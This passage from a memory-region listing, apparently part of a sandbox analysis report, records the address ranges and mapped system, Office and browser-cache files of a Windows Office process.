entry_point = 0x0
region_type = private
name = "private_0x000007febdd50000"
filename = ""
Region:
id = 531
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 532
start_va = 0x230000
end_va = 0x230fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 533
start_va = 0x7fefda80000
end_va = 0x7fefda8efff
entry_point = 0x7fefda80000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 534
start_va = 0x7fefc4b0000
end_va = 0x7fefc505fff
entry_point = 0x7fefc4b0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 535
start_va = 0x240000
end_va = 0x242fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 536
start_va = 0x2e0000
end_va = 0x35ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 537
start_va = 0x2350000
end_va = 0x242efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002350000"
filename = ""
Region:
id = 538
start_va = 0x7feef080000
end_va = 0x7feef522fff
entry_point = 0x7feef080000
region_type = mapped_file
name = "mso20win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll")
Region:
id = 539
start_va = 0x250000
end_va = 0x25ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 540
start_va = 0x260000
end_va = 0x262fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 541
start_va = 0x2590000
end_va = 0x259ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 542
start_va = 0x7feee990000
end_va = 0x7feef073fff
entry_point = 0x7feee990000
region_type = mapped_file
name = "mso30win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll")
Region:
id = 543
start_va = 0x270000
end_va = 0x272fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 544
start_va = 0x2430000
end_va = 0x252ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 545
start_va = 0x7feedec0000
end_va = 0x7feee98efff
entry_point = 0x7feedec0000
region_type = mapped_file
name = "mso40uiwin32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll")
Region:
id = 546
start_va = 0x7fefc290000
end_va = 0x7fefc4a4fff
entry_point = 0x7fefc290000
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")
Region:
id = 547
start_va = 0x280000
end_va = 0x282fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000280000"
filename = ""
Region:
id = 548
start_va = 0x7fef34f0000
end_va = 0x7fef357afff
entry_point = 0x7fef34f0000
region_type = mapped_file
name = "mso50win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso50win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso50win32client.dll")
Region:
id = 549
start_va = 0x290000
end_va = 0x292fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 550
start_va = 0x7feed210000
end_va = 0x7feedeb6fff
entry_point = 0x7feed210000
region_type = mapped_file
name = "mso98win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso98win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso98win32client.dll")
Region:
id = 551
start_va = 0x7fefbee0000
end_va = 0x7fefbef0fff
entry_point = 0x7fefbee0000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 552
start_va = 0x2b0000
end_va = 0x2b2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002b0000"
filename = ""
Region:
id = 553
start_va = 0x25c0000
end_va = 0x26bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000025c0000"
filename = ""
Region:
id = 554
start_va = 0x7feeb7e0000
end_va = 0x7feed20bfff
entry_point = 0x7feeb7e0000
region_type = mapped_file
name = "mso.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll")
Region:
id = 555
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 556
start_va = 0x26c0000
end_va = 0x28bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 557
start_va = 0x7fefa750000
end_va = 0x7fefaa65fff
entry_point = 0x7fefa750000
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")
Region:
id = 558
start_va = 0x7fef3400000
end_va = 0x7fef34e1fff
entry_point = 0x7fef3400000
region_type = mapped_file
name = "d2d1.dll"
filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll")
Region:
id = 559
start_va = 0x7fefa530000
end_va = 0x7fefa74cfff
entry_point = 0x7fefa530000
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 560
start_va = 0x7fefc690000
end_va = 0x7fefc883fff
entry_point = 0x7fefc690000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 561
start_va = 0x2d0000
end_va = 0x2d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002d0000"
filename = ""
Region:
id = 562
start_va = 0x7fefdb30000
end_va = 0x7fefdb6cfff
entry_point = 0x7fefdb30000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 563
start_va = 0x2900000
end_va = 0x29fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 564
start_va = 0x2a60000
end_va = 0x2b5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a60000"
filename = ""
Region:
id = 565
start_va = 0x2c90000
end_va = 0x2c9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c90000"
filename = ""
Region:
id = 566
start_va = 0x2d20000
end_va = 0x2e1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d20000"
filename = ""
Region:
id = 567
start_va = 0x2e90000
end_va = 0x2f8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e90000"
filename = ""
Region:
id = 568
start_va = 0x37a30000
end_va = 0x37a3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000037a30000"
filename = ""
Region:
id = 569
start_va = 0x7fee5dc0000
end_va = 0x7fee5f3dfff
entry_point = 0x7fee5dc0000
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll")
Region:
id = 570
start_va = 0x7fee6110000
end_va = 0x7fee62acfff
entry_point = 0x7fee6110000
region_type = mapped_file
name = "msointl.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll")
Region:
id = 571
start_va = 0x7fee62b0000
end_va = 0x7feea696fff
entry_point = 0x7fee62b0000
region_type = mapped_file
name = "msores.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll")
Region:
id = 572
start_va = 0x7feea6a0000
end_va = 0x7feeb394fff
entry_point = 0x7feea6a0000
region_type = mapped_file
name = "mso99lres.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll")
Region:
id = 573
start_va = 0x7feeb3a0000
end_va = 0x7feeb7dcfff
entry_point = 0x7feeb3a0000
region_type = mapped_file
name = "mso40uires.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll")
Region:
id = 574
start_va = 0x7fef3320000
end_va = 0x7fef3330fff
entry_point = 0x7fef3320000
region_type = mapped_file
name = "msointl30.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll")
Region:
id = 575
start_va = 0x7fefcd50000
end_va = 0x7fefcd5bfff
entry_point = 0x7fefcd50000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 576
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 577
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 578
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 579
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 580
start_va = 0x2f90000
end_va = 0x338ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002f90000"
filename = ""
Region:
id = 581
start_va = 0x3410000
end_va = 0x350ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003410000"
filename = ""
Region:
id = 582
start_va = 0x77e00000
end_va = 0x77e06fff
entry_point = 0x77e00000
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 583
start_va = 0x7fef9810000
end_va = 0x7fef98b6fff
entry_point = 0x7fef9810000
region_type = mapped_file
name = "dxgi.dll"
filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")
Region:
id = 584
start_va = 0x7fef98c0000
end_va = 0x7fef9914fff
entry_point = 0x7fef98c0000
region_type = mapped_file
name = "d3d10_1core.dll"
filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll")
Region:
id = 585
start_va = 0x7fef9920000
end_va = 0x7fef9953fff
entry_point = 0x7fef9920000
region_type = mapped_file
name = "d3d10_1.dll"
filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll")
Region:
id = 586
start_va = 0x7fefc080000
end_va = 0x7fefc097fff
entry_point = 0x7fefc080000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 587
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 588
start_va = 0x7fee5f40000
end_va = 0x7fee610ffff
entry_point = 0x7fee5f40000
region_type = mapped_file
name = "d3d10warp.dll"
filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll")
Region:
id = 589
start_va = 0x2c0000
end_va = 0x2c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 590
start_va = 0x7fefdce0000
end_va = 0x7fefdd15fff
entry_point = 0x7fefdce0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 591
start_va = 0x7fefddd0000
end_va = 0x7fefdde9fff
entry_point = 0x7fefddd0000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 592
start_va = 0x7feff2f0000
end_va = 0x7feff4c6fff
entry_point = 0x7feff2f0000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 593
start_va = 0x7fefdc30000
end_va = 0x7fefdc3efff
entry_point = 0x7fefdc30000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 594
start_va = 0x7fefdd20000
end_va = 0x7fefdd59fff
entry_point = 0x7fefdd20000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 595
start_va = 0x7fefddf0000
end_va = 0x7fefdf56fff
entry_point = 0x7fefddf0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 596
start_va = 0x7fef3620000
end_va = 0x7fef36e5fff
entry_point = 0x7fef3620000
region_type = mapped_file
name = "d3d11.dll"
filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll")
Region:
id = 597
start_va = 0x3590000
end_va = 0x368ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003590000"
filename = ""
Region:
id = 598
start_va = 0x7fef31e0000
end_va = 0x7fef31fbfff
entry_point = 0x7fef31e0000
region_type = mapped_file
name = "davclnt.dll"
filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll")
Region:
id = 599
start_va = 0x7fef92e0000
end_va = 0x7fef92e9fff
entry_point = 0x7fef92e0000
region_type = mapped_file
name = "davhlpr.dll"
filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")
Region:
id = 600
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 601
start_va = 0x2530000
end_va = 0x2534fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002530000"
filename = ""
Region:
id = 602
start_va = 0x3690000
end_va = 0x378ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003690000"
filename = ""
Region:
id = 603
start_va = 0x37d0000
end_va = 0x38cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000037d0000"
filename = ""
Region:
id = 604
start_va = 0x3960000
end_va = 0x3a5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003960000"
filename = ""
Region:
id = 605
start_va = 0x3a60000
end_va = 0x425ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003a60000"
filename = ""
Region:
id = 606
start_va = 0x42e0000
end_va = 0x43dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000042e0000"
filename = ""
Region:
id = 607
start_va = 0x4560000
end_va = 0x465ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004560000"
filename = ""
Region:
id = 608
start_va = 0x7febfb90000
end_va = 0x7febfb9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007febfb90000"
filename = ""
Region:
id = 609
start_va = 0x7fefda20000
end_va = 0x7fefda2afff
entry_point = 0x7fefda20000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 610
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 611
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 612
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 613
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 614
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 615
start_va = 0x7fefda50000
end_va = 0x7fefda74fff
entry_point = 0x7fefda50000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 616
start_va = 0x2540000
end_va = 0x2540fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002540000"
filename = ""
Region:
id = 617
start_va = 0x2550000
end_va = 0x2550fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002550000"
filename = ""
Region:
id = 618
start_va = 0x7fef5ff0000
end_va = 0x7fef6063fff
entry_point = 0x7fef5ff0000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 619
start_va = 0x7fefb800000
end_va = 0x7fefb814fff
entry_point = 0x7fefb800000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 620
start_va = 0x7feff9a0000
end_va = 0x7feffa38fff
entry_point = 0x7feff9a0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 621
start_va = 0x7feffec0000
end_va = 0x7feffec7fff
entry_point = 0x7feffec0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 622
start_va = 0x2c60000
end_va = 0x2c6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c60000"
filename = ""
Region:
id = 623
start_va = 0x7fefee30000
end_va = 0x7fefee7cfff
entry_point = 0x7fefee30000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 624
start_va = 0x7fee5a80000
end_va = 0x7fee5d1afff
entry_point = 0x7fee5a80000
region_type = mapped_file
name = "riched20.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll")
Region:
id = 625
start_va = 0x7fef92d0000
end_va = 0x7fef92d4fff
entry_point = 0x7fef92d0000
region_type = mapped_file
name = "ospintl.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ospintl.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\ospintl.dll")
Region:
id = 626
start_va = 0x2560000
end_va = 0x2570fff
entry_point = 0x2560000
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 627
start_va = 0x4780000
end_va = 0x47fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004780000"
filename = ""
Region:
id = 628
start_va = 0x7fee5900000
end_va = 0x7fee5a73fff
entry_point = 0x7fee5900000
region_type = mapped_file
name = "msptls.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll")
Region:
id = 629
start_va = 0x7fefd480000
end_va = 0x7fefd496fff
entry_point = 0x7fefd480000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 630
start_va = 0x4800000
end_va = 0x512ffff
entry_point = 0x4800000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 631
start_va = 0x7fefd180000
end_va = 0x7fefd1c6fff
entry_point = 0x7fefd180000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 632
start_va = 0x2b60000
end_va = 0x2c5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b60000"
filename = ""
Region:
id = 633
start_va = 0x5220000
end_va = 0x531ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005220000"
filename = ""
Region:
id = 634
start_va = 0x745d0000
end_va = 0x745d2fff
entry_point = 0x745d0000
region_type = mapped_file
name = "sfc.dll"
filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")
Region:
id = 635
start_va = 0x7fef59c0000
end_va = 0x7fef59cbfff
entry_point = 0x7fef59c0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 636
start_va = 0x7fef6fc0000
end_va = 0x7fef6fcffff
entry_point = 0x7fef6fc0000
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 637
start_va = 0x7fefdb70000
end_va = 0x7fefdb83fff
entry_point = 0x7fefdb70000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 638
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 639
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 640
start_va = 0x77e10000
end_va = 0x77e12fff
entry_point = 0x77e10000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 641
start_va = 0x7fef7190000
end_va = 0x7fef71f3fff
entry_point = 0x7fef7190000
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 642
start_va = 0x7fef7200000
end_va = 0x7fef7270fff
entry_point = 0x7fef7200000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 643
start_va = 0x7fefb670000
end_va = 0x7fefb67afff
entry_point = 0x7fefb670000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 644
start_va = 0x7fefb680000
end_va = 0x7fefb6a6fff
entry_point = 0x7fefb680000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 645
start_va = 0x53c0000
end_va = 0x54bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000053c0000"
filename = ""
Region:
id = 646
start_va = 0x7fef9680000
end_va = 0x7fef9690fff
entry_point = 0x7fef9680000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 647
start_va = 0x7fefee80000
end_va = 0x7feff0d8fff
entry_point = 0x7fefee80000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 648
start_va = 0x7feff6e0000
end_va = 0x7feff857fff
entry_point = 0x7feff6e0000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 649
start_va = 0x7feff870000
end_va = 0x7feff999fff
entry_point = 0x7feff870000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 650
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 651
start_va = 0x7fef9660000
end_va = 0x7fef9677fff
entry_point = 0x7fef9660000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 652
start_va = 0x7fefbb00000
end_va = 0x7fefbb2cfff
entry_point = 0x7fefbb00000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 653
start_va = 0x7feffe60000
end_va = 0x7feffeb1fff
entry_point = 0x7feffe60000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 654
start_va = 0x2580000
end_va = 0x2580fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002580000"
filename = ""
Region:
id = 655
start_va = 0x25a0000
end_va = 0x25a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000025a0000"
filename = ""
Region:
id = 656
start_va = 0x25b0000
end_va = 0x25bbfff
entry_point = 0x25b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 657
start_va = 0x28c0000
end_va = 0x28c7fff
entry_point = 0x28c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 658
start_va = 0x28d0000
end_va = 0x28dffff
entry_point = 0x28d0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 659
start_va = 0x54c0000
end_va = 0x5802fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000054c0000"
filename = ""
Region:
id = 660
start_va = 0x7fefd2a0000
end_va = 0x7fefd2fafff
entry_point = 0x7fefd2a0000
